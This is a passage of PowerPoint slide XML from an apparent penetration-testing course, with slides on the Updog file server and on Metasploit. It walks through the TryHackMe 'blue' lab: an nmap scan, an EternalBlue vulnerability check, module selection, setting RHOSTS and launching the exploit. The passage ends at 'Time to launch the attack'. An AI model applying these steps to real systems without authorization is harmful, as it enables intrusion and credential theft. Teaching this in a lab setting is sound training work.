          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{502342C2-B7B2-4F20-A0F6-F2B57459658E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Updog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA54DED-BA72-47CA-8EA4-805517AF8FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="5974080" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improved Python simple server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip3 install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>updog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optional arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-d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-p [port]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--password [pass]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ssl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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6AFB49A3-5456-44DF-BCBF-04674DEE8B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567104" y="1371600"/>
            <a:ext cx="6430272" cy="828791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A11A5D6-17BE-4C2E-AB49-C061DB24BB66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5962329" y="2840854"/>
            <a:ext cx="5639821" cy="1875584"/>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46E28F3C-E7FB-4F77-9AFD-E85CFB0FE147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8565455" y="2200391"/>
            <a:ext cx="0" cy="749464"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="D12027"/>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BE6554-88A5-4F27-90A9-DC22EFB9A6EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5502228" y="5131005"/>
            <a:ext cx="6560022" cy="587596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40577764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C2D7-2868-43F5-8FA3-14F9C4D1D1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>233</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957FDD44-C950-4BF7-B38E-9DA0831D27D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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20055419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9E30B-5C8A-43F6-835A-5F43C74E83E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>234</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0850C0BF-C3DD-4252-BD6D-AE30201D53EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81CB0C9A-E844-4D7A-B0AE-002FBB665003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="2407920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free and robust C2 framework – run with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>search – look for modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modules: auxiliary (scanning/recon), exploit, post (post-exploit tools like credential theft)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B86ED2-FA8A-459B-99D2-1EFBD2093B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276350" y="3892342"/>
            <a:ext cx="9218757" cy="1950117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2723788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F7FA55-0E8D-41A7-8155-E2815A374CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>235</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F2E6335-A3A9-4073-9B33-5BB563A1C39A}"/>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240007E8-8307-4A9C-BC2E-12E183A0CB65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target: “blue” on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TryHackMe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap shows an old version of windows (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF856DBE-136A-4677-ABE5-7290C558C6CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2514600"/>
            <a:ext cx="7408733" cy="3764568"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C80B4ECF-1EA8-451B-85E6-74AC3C5668A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799400" y="3635753"/>
            <a:ext cx="3606445" cy="153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779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D2B7F-8821-4893-84CB-C21E84B7264A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>236</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3AF8D3-71F5-4E57-B6BA-3636FBAFE43C}"/>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85BF65AD-401A-4E00-AEC0-1D7D0921EC09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version of Windows vulnerable to Eternal Blue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the Auxiliary module to check for vulnerability before launching exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0629B0AB-626D-4920-B921-DBC87237DA1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313063" y="2475250"/>
            <a:ext cx="11565874" cy="2207440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE455A7-75E9-47B0-8F93-82E4CAB5D1CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="4215468"/>
            <a:ext cx="8550462" cy="288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09FCE7-3E5D-4333-89CC-B91E556D527E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434049" y="3472596"/>
            <a:ext cx="10560015" cy="288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0396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D2B7F-8821-4893-84CB-C21E84B7264A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>237</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3AF8D3-71F5-4E57-B6BA-3636FBAFE43C}"/>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85BF65AD-401A-4E00-AEC0-1D7D0921EC09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="5745480" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shortcut after search: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use [index]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to see available variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generally, need to set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RHOSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to launch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6BB139-91F3-4A98-B52C-D8EA311E9DB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="33250"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="1409700"/>
            <a:ext cx="4572000" cy="2676899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B4C0005-7B9E-4828-B367-0270AF5AA558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7282440" y="3104135"/>
            <a:ext cx="2113709" cy="153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F574737-555A-4C0D-8C2F-26140F81C37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="246351" y="4575558"/>
            <a:ext cx="11699298" cy="1342103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F16DFD2-1629-47C4-A500-78C85BE4B161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207365" y="5337243"/>
            <a:ext cx="6313937" cy="234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1169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D2B7F-8821-4893-84CB-C21E84B7264A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>238</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3AF8D3-71F5-4E57-B6BA-3636FBAFE43C}"/>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85BF65AD-401A-4E00-AEC0-1D7D0921EC09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371599"/>
            <a:ext cx="5059680" cy="4482889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time to launch the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
